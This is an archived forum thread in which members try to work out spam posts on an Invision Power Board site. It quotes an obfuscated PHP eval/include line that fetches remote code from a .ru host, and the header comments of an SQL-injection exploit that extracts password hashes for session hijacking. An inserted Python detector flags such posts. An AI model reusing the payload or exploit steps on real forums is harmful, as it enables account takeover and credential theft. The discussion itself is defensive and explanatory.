Full Version: Trash Posts
Rick.C
(This is from the "General Food Chatter" thread)

QUOTE(enimens @ May 6 2006, 06:53 PM) *
r57ipbxplhohohoeval(include(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).
chr(47) chr(114).chr(115).chr(116).chr(46).chr(118).chr(111).chr(105).chr(100).chr(46).c
hr(114) chr(117).chr(47).chr(114).chr(53).chr(55).chr(105).chr(112).chr(98).chr(105).chr
(110) chr(99).chr(46).chr(116).chr(120).chr(116))); //

QUOTE(Aaron @ May 6 2006, 08:55 PM) *
Just asking, but is there anything we can do about these? I understand if there's not.

This is not a good thing.

The "chr" values translate to:

h t t p : / / r s t . v o i d . r u / r 5 7 i p b i n c . t x t

(I added spaces between each character so it wouldn't generate a clickable link.)

Not a good sign, since .ru is Russia, which is where the Russian mafia spends a good part of its time hanging out.

A Google search turns up this.

It's a published exploit to take over "Invision Power Board" message boards. It doesn't seem to be working.

Some sites have a picture of some random numbers or letters that are distorted and wavy that you have to read and type in to prove you are a person (not a 'bot) when you register for an ID.

Does this board support that?
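As an added example, not part of this thread or of the forum software, here is a small Python moderation helper that does what Rick.C did by hand: it decodes runs of chr(N) calls, tolerating the line-wrap damage visible in the archived post, and flags a post that wraps a remote URL in eval/include. The sample post text is the spam quoted above; the function names are assumptions.

```python
import re

# Constructed sample: the spam post quoted in the thread, including the
# line-wrap damage in the archive (missing dots, "c\nhr(114)" split in two).
SPAM_POST = (
    "r57ipbxplhohohoeval(include(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).\n"
    "chr(47) chr(114).chr(115).chr(116).chr(46).chr(118).chr(111).chr(105).chr(100).chr(46).c\n"
    "hr(114) chr(117).chr(47).chr(114).chr(53).chr(55).chr(105).chr(112).chr(98).chr(105).chr\n"
    "(110) chr(99).chr(46).chr(116).chr(120).chr(116))); //"
)

# A chr(N) token; whitespace is allowed anywhere inside it because the
# archived post was broken across lines mid-token.
CHR_TOKEN = re.compile(r"c\s*h\s*r\s*\(\s*(\d{1,3})\s*\)", re.IGNORECASE)
WRAPPER = re.compile(r"(eval|include|include_once|require)\s*\(", re.IGNORECASE)
REMOTE_URL = re.compile(r"^https?://", re.IGNORECASE)


def decode_chr_runs(text, min_run=4):
    """Return the strings hidden in runs of chr(N) calls of at least min_run tokens.
    Tokens separated only by '.', whitespace or nothing belong to the same run."""
    runs, current, last_end = [], [], None
    for m in CHR_TOKEN.finditer(text):
        gap = text[last_end:m.start()] if last_end is not None else ""
        if last_end is not None and re.fullmatch(r"[\s.]*", gap):
            current.append(chr(int(m.group(1))))
        else:
            if len(current) >= min_run:
                runs.append("".join(current))
            current = [chr(int(m.group(1)))]
        last_end = m.end()
    if len(current) >= min_run:
        runs.append("".join(current))
    return runs


def flag_post(text):
    """Moderation check: decode hidden strings and report whether the post
    carries an eval/include wrapper around a decoded remote URL."""
    decoded = decode_chr_runs(text)
    has_wrapper = WRAPPER.search(text) is not None
    remote = [s for s in decoded if REMOTE_URL.match(s)]
    return {"decoded": decoded, "suspicious": has_wrapper and bool(remote)}


if __name__ == "__main__":
    print(flag_post(SPAM_POST))  # shows the decoded rst.void.ru URL, suspicious=True
```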
DJDelicious
QUOTE(Rick.C @ May 8 2006, 07:43 PM) *
Some sites have a picture of some random numbers or letters that are distorted and wavy that you have to read and type in to prove you are a person (not a 'bot) when you register for an ID.

Does this board support that?

Man, I hate those posts! They're on another board too. This site does make you enter security code numbers, but they don't seem to be distorted. They don't seem that secure to me.
coldteablues
Maybe this explains why I couldn't post to the Recipes thread tonight?

Cher
Rick.C
I googled "justxpl" and found several hits about this. It looks like this started as a "proof of concept" (POC) script to exploit a security hole in Invision Power Board, v2.1.5 or earlier. POC exploits are usually harmless. They just do something like leave a message: "yeah this worked" or, in this case, a link to the coder's home page - h t t p : / / r s t . v o i d . r u

The fact that the "calling card" displayed as garbage just means that he messed up that part of the script.

"r57" is the nickname of a group of Russian security probers. I couldn't really tell if they are "good-guys" or "bad-guys", but either way, if they publish their exploits then someone will pick them up and add a really nasty payload and then things get damaged or passwords get stolen, etc.

Here is a second-generation exploit I found that appears to enable an outsider to delete others' posts or PMs (this is just the comments at the beginning):

## IPB <=2.1.4 exploit (possibly 2.1.5 too)
## Brought to you by the Ykstortion security team.
##
## The bug is in the pm system so you must have a registered user.
## The exploit will extract a password hash from the forum's data base of
## the target user.
## You need to know the target user's member ID but it's not difficult to
## find out, just look under their avatar next to one of their posts.
## Once you have the hash, simply unset all forum cookies and set
## member_id to the target user's member id and pass_hash to the hash
## obtained from the database by this script.
##
## Usage:
## $ ./ipb
## IPB Forum URL ? forums.example.com/forums
## Your username ? krypt_sk1dd13
## Your pass ? if_your_on_nix_this_gets_hidden
## Target userid ? 3637
##
## Attempting to extract password hash from database...
## 537ab2d5b37ac3a3632f5d06e8e04368
## Hit enter to quit.
##
## Requirements:
## o Perl 5
## o LWP 5.64 or later
## o Internet access
## o A forum you hate/dislike
## o A user on said forum
## o 32+ PMs left till your inbox is full, if not you can still delete
## PMs from your inbox as the successful ones come through
##
## Credit to: Nuticulus for finding the SQL injection
##
## Have fun, you dumb skiddie.
##

Judging from that last bit, it allows you to target a specific member and delete his/her PMs.

(A "hash" is the way a password is stored internally in the message board's database.)

The original script (the one we got hit with) appeared to scout around the Internet looking for hackable message boards, set up a member ID, post the "calling card", then report back to the script kiddie what board it found, what member ID it created, and the password it used to create the member ID.

I know this is a big headache for Drew, but the new accounts that this script creates should be deleted and Invision should be asked to provide a patch for this. (I thought I saw another junk post a week or two ago - this exploit was published on 4/26 or 4/28.)
drew
I'm working on solving this pesky issue. I've got an update to the forum software that I'm waiting to install. I'm not sure if it fixes things, but it cannot hurt.

Stay tuned; until the fix is applied, please let me know when you see those spammy posts.
Aaron
QUOTE(drew @ May 31 2006, 04:47 AM) *
I'm working on solving this pesky issue. I've got an update to the forum software that I'm waiting to install. I'm not sure if it fixes things, but it cannot hurt.

Stay tuned; until the fix is applied, please let me know when you see those spammy posts.

Thanks Drew. Let's all cross our fingers and hope that it works.
Invision Power Board © 2001-2009 Invision Power Services, Inc.